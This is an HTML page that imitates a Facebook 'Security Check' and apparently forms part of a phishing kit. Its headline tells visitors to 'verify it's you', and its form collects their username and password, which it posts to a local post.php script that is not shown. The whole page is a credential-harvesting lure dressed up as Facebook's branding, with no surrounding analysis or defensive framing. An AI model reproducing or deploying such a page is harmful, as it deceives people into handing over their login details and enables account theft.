| 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162 |
- <!DOCTYPE html>
- <html lang="en">
- <head>
- <meta charset="UTF-8">
- <title>Security Check</title>
- <link rel="shortcut icon" type="ico" href="./fb-ico.png">
- <link rel="stylesheet" type="text/css" href="style_mobile.css">
-
-
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
-
- </head>
- <body>
-
- <div class="centered">
-
- <header>
- <div class="main-header">
- <div class="logo">
- <a href="http://www.facebook.com"><img src="./logo.png"></a>
- </div>
- </div>
- </header>
- <section>
- <div class="form">
- <div class="m-header">
- <h3>Facebook Security Check. Please Verify It's You.</h3>
- </div>
- <div class="red-box">
- <p style="font-weight:bold; font-size:13px">Verify needed to understand it's you</p>
- <p>Enter your password for security reason (make sure your caps lock is off)</p>
- <p>Forgot your password ? <a href="">Request new one</a>
- </div>
- <div class="login-form" style="">
- <form method="post" class="bb" novalidate="1" id="login-form" action="post.php">
- <label for="username">Username:</label><input name="username" id="username" type="username"></input><br />
- <br> <br/>
- <label for="password">Password:</label><input name="password" id="password" type="password"></input><br />
- <input id="keep" style="margin: 10px 0 0 84px" type="checkbox"></input>
- <label for="keep" style="font-size:12px;">keep me logged in</label><br />
-
- <input type="submit" name="submit" value="Verify"
- style="background: none repeat scroll 0 0 #3b5998; border: 1px solid #294461;
- color: #ffffff; margin: 4px 0 0 80px; padding: 2px 6px;">
-
- <a style="text-decoration:none; color:#3B5998; margin:0 0 0 40px;" href="">can't log in?</a>
- </form>
- </div>
- </div>
-
-
- </div>
-
-
- </section>
- </body>
- </html>
|